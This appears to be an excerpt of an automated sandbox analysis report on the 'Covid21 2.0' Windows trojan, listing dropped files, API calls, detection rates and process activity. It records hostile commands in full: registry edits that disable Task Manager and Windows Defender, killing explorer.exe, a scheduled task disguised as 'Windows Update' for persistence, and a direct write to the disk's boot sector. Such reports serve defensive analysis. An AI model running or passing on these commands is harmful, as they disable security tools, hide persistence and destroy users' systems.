Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0041EC2C GetLastError,FormatMessageA,6_2_0041EC2C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042CAA7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,EnumWindows,ExitWindowsEx,18_2_0042CAA7
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00408862 GetDiskFreeSpaceA,6_2_00408862
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0042B61C CoInitialize,CoCreateInstance,GetKeyboardLayout,MultiByteToWideChar,CoUninitialize,18_2_0042B61C
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_004020C9 FindResourceA,LoadResource,SizeofResource,0_2_004020C9
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6632:120:WilError_01
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmpJump to behavior
Source: C:\Users\user\Desktop\Covid21 2.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\covid21\Corona.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;explorer.exe&quot;)
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Covid21 2.0.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Covid21 2.0.exeVirustotal: Detection: 69%
Source: Covid21 2.0.exeMetadefender: Detection: 29%
Source: Covid21 2.0.exeReversingLabs: Detection: 75%
Source: unknownProcess created: C:\Users\user\Desktop\Covid21 2.0.exe 'C:\Users\user\Desktop\Covid21 2.0.exe'
Source: C:\Users\user\Desktop\Covid21 2.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' '
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpg
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\covid21\Corona.exe c:\covid21\corona.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe inv.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe z.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exe mlt.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe icons.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe screenscrew.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbs'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im explorer.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe PayloadMBR.exe
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe'
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Covid21 2.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\AppData\Local\Temp\2526.tmp\Covid21.bat' 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript prompt.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe Reg add 'HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender' /v DisableAntiSpyware /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpgJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K coronaloop.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exe inv.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exe z.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exe clwcp c:\covid21\covid.jpgJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exe icons.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exe screenscrew.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbs' Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 5 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im explorer.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe PayloadMBR.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\covid21\Corona.exe c:\covid21\corona.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe'
Source: C:\Users\user\Desktop\Covid21 2.0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\timeout.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Windows\SysWOW64\wscript.exeAutomated click: OK
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Covid21 2.0.exeStatic file information: File size 1210880 > 1048576
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00405EB2 GetTempPathA,LoadLibraryA,GetProcAddress,GetLongPathNameA,FreeLibrary,0_2_00405EB2
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00478069 push 004112A1h; ret 0_2_004780AE
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_004780BA push 004112D8h; ret 0_2_004780E5
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_004775D7 push 0041083Ah; ret 0_2_00477647
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00477651 push 004108E4h; ret 0_2_004776F1
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_004776FB push 00410A14h; ret 0_2_00477821
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_0046DAD9 push 00406CF0h; ret 0_2_0046DAFD
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_0046CB59 push 00405D95h; ret 0_2_0046CBA2
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00473B01 push ecx; mov dword ptr [esp], edx0_2_00473B06
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_0046DB11 push 00407000h; ret 0_2_0046DE0D
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_0046CD7D push 00405F94h; ret 0_2_0046CDA1
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_00469DB9 push eax; ret 0_2_00469DF5
Source: C:\Users\user\Desktop\Covid21 2.0.exeCode function: 0_2_0046CE0D push 00406024h; ret 0_2_0046CE31
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00441090 push 0044111Dh; ret 6_2_00441115
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0040D62C push 0040D69Bh; ret 6_2_0040D693
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00405D44 push 00405D95h; ret 6_2_00405D8D
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00442080 push ecx; mov dword ptr [esp], edx6_2_00442084
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004162B8 push ecx; mov dword ptr [esp], edx6_2_004162BA
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0044237C push 004423A8h; ret 6_2_004423A0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0044A328 push 0044A393h; ret 6_2_0044A38B
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00428488 push 004284CAh; ret 6_2_004284C2
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042E5E8 push 0042E614h; ret 6_2_0042E60C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042E63C push 0042E668h; ret 6_2_0042E660
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004107C2 push 0041083Ah; ret 6_2_00410832
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004107C4 push 0041083Ah; ret 6_2_00410832
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042C844 push 0042C870h; ret 6_2_0042C868
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042C87C push 0042C8A8h; ret 6_2_0042C8A0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042C80C push 0042C838h; ret 6_2_0042C830
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0041083C push 004108E4h; ret 6_2_004108DC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004108E6 push 00410A14h; ret 6_2_00410A0C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042C8EC push 0042C918h; ret 6_2_0042C910
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0042C8B4 push 0042C8E0h; ret 6_2_0042C8D8
Source: initial sampleStatic PE information: section name: UPX0
Source: initial sampleStatic PE information: section name: UPX1

Persistence and Installation Behavior:

barindex
Command shell drops VBS filesShow sources
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\x.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\y.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\t.vbsJump to behavior
Uses cmd line tools excessively to alter registry or file dataShow sources
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Writes directly to the primary disk partition (DR0)Show sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeFile written: \Device\Harddisk0\DR0 offset: unknown length: 12288
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\Corona.exeJump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\mlt.exeJump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeJump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeJump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\screenscrew.exeJump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeJump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\covid21\Corona.exeJump to dropped file
Source: C:\Users\user\Desktop\Covid21 2.0.exeFile created: C:\Users\user\AppData\Local\Temp\2526.tmp\icons.exeJump to dropped file

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /Create /TN 'Windows Update' /ru SYSTEM /SC ONSTART /TR 'C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exe'
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\PayloadMBR.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Windows Update
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_004554C4 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,6_2_004554C4
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00452098 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow,6_2_00452098
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0043AB48 IsIconic,GetCapture,6_2_0043AB48
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0043B440 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,6_2_0043B440
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00425458 IsIconic,GetWindowPlacement,GetWindowRect,6_2_00425458
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00455BEC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,6_2_00455BEC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_00455CB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,6_2_00455CB0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\CLWCP.exeCode function: 6_2_0043BD64 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,6_2_0043BD64
Source: C:\covid21\Corona.exeCode function: 12_2_0044CF30 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,12_2_0044CF30
Source: C:\covid21\Corona.exeCode function: 12_2_00449F58 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,12_2_00449F58
Source: C:\covid21\Corona.exeCode function: 12_2_0043402C IsIconic,GetCapture,12_2_0043402C
Source: C:\covid21\Corona.exeCode function: 12_2_004348E0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,12_2_004348E0
Source: C:\covid21\Corona.exeCode function: 12_2_00435160 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,12_2_00435160
Source: C:\covid21\Corona.exeCode function: 12_2_0044D650 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,12_2_0044D650
Source: C:\covid21\Corona.exeCode function: 12_2_0044D700 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,12_2_0044D700
Source: C:\covid21\Corona.exeCode function: 12_2_0042397C MonitorFromWindow,MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,12_2_0042397C
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044A498 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,13_2_0044A498
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00432810 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,13_2_00432810
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044ABB8 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,13_2_0044ABB8
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_0044AC68 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,13_2_0044AC68
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_004474C0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,13_2_004474C0
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_004316DC IsIconic,GetCapture,13_2_004316DC
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00421D38 IsIconic,GetWindowPlacement,GetWindowRect,13_2_00421D38
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\inv.exeCode function: 13_2_00431F90 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,13_2_00431F90
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_0043A0D6 GetForegroundWindow,IsWindowVisible,GetWindowThreadProcessId,IsZoomed,IsIconic,GetWindowLongA,GetModuleHandleA,GetProcAddress,18_2_0043A0D6
Source: C:\Users\user\AppData\Local\Temp\2526.tmp\z.exeCode function: 18_2_004360F9 SetWindowTextA,IsZoomed,IsIconic,ShowWindow,IsIconic,GetWindowLongA,GetWindowLongA,GetWindowRect,MapWindowPoints,GetWindowLongA,GetWindowRect,GetWindowLongA,GetWindowRect,GetClientRect,IsWindowVisible,GetWindowLongA,GetMenu,GetWindowLongA,AdjustWindowRectEx,SystemParametersInfoA,GetWindowRect,IsZoomed,ShowWindow,MoveWindow,GetWindowRect,GetClientRect,ShowWindow,GetForegroundWindow,GetFocus,UpdateWindow,SetFocus,18_2_004360F9
